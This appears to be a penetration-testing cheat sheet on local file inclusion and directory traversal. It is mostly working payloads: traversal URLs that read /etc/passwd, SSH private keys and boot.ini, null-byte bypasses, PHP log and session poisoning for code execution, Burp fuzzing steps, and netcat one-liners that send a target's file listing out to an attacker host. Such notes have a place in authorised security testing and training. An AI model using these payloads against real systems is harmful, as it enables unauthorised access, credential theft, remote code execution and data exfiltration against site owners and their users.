Local File Inclusion (LFI)

AKA: Directory Traversal

Local File Inclusion

LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd

Automation

nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali

Whoami Home SSH:

whoami:
/proc/self/status  ..match 100:101 with /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?

Code exe with 'environ'

  • If you have access to 'environ' - you might have code execution

  • Burp > Repeater > /proc/self/environ

graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go

Fuzzing LFI

graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt

Start Attack
Sort by Length ..to see results

RFI from LFI (php cookies)

  • If you can locate the 'session' cookies

  • You may be able to inject them into Burp Repeater to get an Execution

cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution

Directory Traversals

--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: Cant leave /var/www/ 

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok

NULL BYTE

  • %00 ..URL-encoded

  • Adding a NULL BYTE will get rid of suffix (on older systems)

  • Works well in Perl and older versions of PHP (solved since 5.3.4)

  • Scenario: Server is adding .png automatically to your page

http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win

Netcat Tricks

target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
PreviousIIS6 WebDavNextMagento

Last updated